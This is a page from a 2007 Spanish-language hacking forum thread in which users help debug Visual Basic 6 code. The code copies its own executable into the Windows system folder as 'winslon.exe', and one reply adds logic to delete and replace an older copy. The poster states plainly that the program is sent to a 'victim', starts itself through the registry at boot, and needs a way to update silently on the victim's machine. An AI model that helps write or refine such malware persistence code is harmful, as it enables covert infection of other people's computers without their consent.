elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  porque me sale este error
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: porque me sale este error  (Leído 3,950 veces)
CeLaYa


Desconectado Desconectado

Mensajes: 543



Ver Perfil
Re: porque me sale este error
« Respuesta #10 en: 20 Enero 2007, 14:27 pm »

te refieres a esta parte??:
Código:
If Right(ruta, 1) <> "\" Then ruta = ruta & "\"
ruta = ruta & App.EXEName & ".exe"
Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)
sys = LCase(sys)
FileCopy ruta, sys & "\winslon.exe"


mmmm  :huh: pues no estoy seguro si el "FileCopy" sobreescribe archivos, pero porque mejor no lo borras y pones el nuevo.

Código:
dim l as long

If Right(ruta, 1) <> "\" Then ruta = ruta & "\"
ruta = ruta & App.EXEName & ".exe"
Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)
sys = LCase(sys)
'--------------------------------------------------------------------
on local error resume next ' Activo el control de errores
l = Getattr(sys & "\winslon.exe") 'Comprueba si ya existe el archivo
if err.number = 0 then
     'Si no se genera error entonces si encontro el archivo
     Kill ruta, sys & "\winslon.exe" ' Lo borra
end if
on local error goto 0 ' Desactivo el control de errores
'---------------------------------------------------------------------
FileCopy ruta, sys & "\winslon.exe" ' y pones el nuevo

y como ahora se que no tienes MSND instalado te diré que la función GetAttr es para obtener los atributos de un archivo (si es de solo lectura y esas cosas) y aqui lo uso para saber si existe el archivo, si existe va a regresar un valor "long" a la variable "l", si no existe se genera un error, por eso pongo el control de errores "On Local Error..."


« Última modificación: 20 Enero 2007, 14:36 pm por CeLaYa » En línea

"La soledad es el elemento de los grandes talentos".
Cristina de Suecia (1626-1689) Reina de Suecia.
shadow.darknesses

Desconectado Desconectado

Mensajes: 73


Ver Perfil
Re: porque me sale este error
« Respuesta #11 en: 20 Enero 2007, 16:29 pm »

es que mira si se lo envio a una victima, ya lo abre, y le quiero enviar una nueva version, no creo que me haga caso de ir a system32 borra el archivo, primer cerralo con ctrl+alt+supr y luego ir a regedit, y borras el registro que dice para que w ejecute cuando enciende el pc
xD


En línea




Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines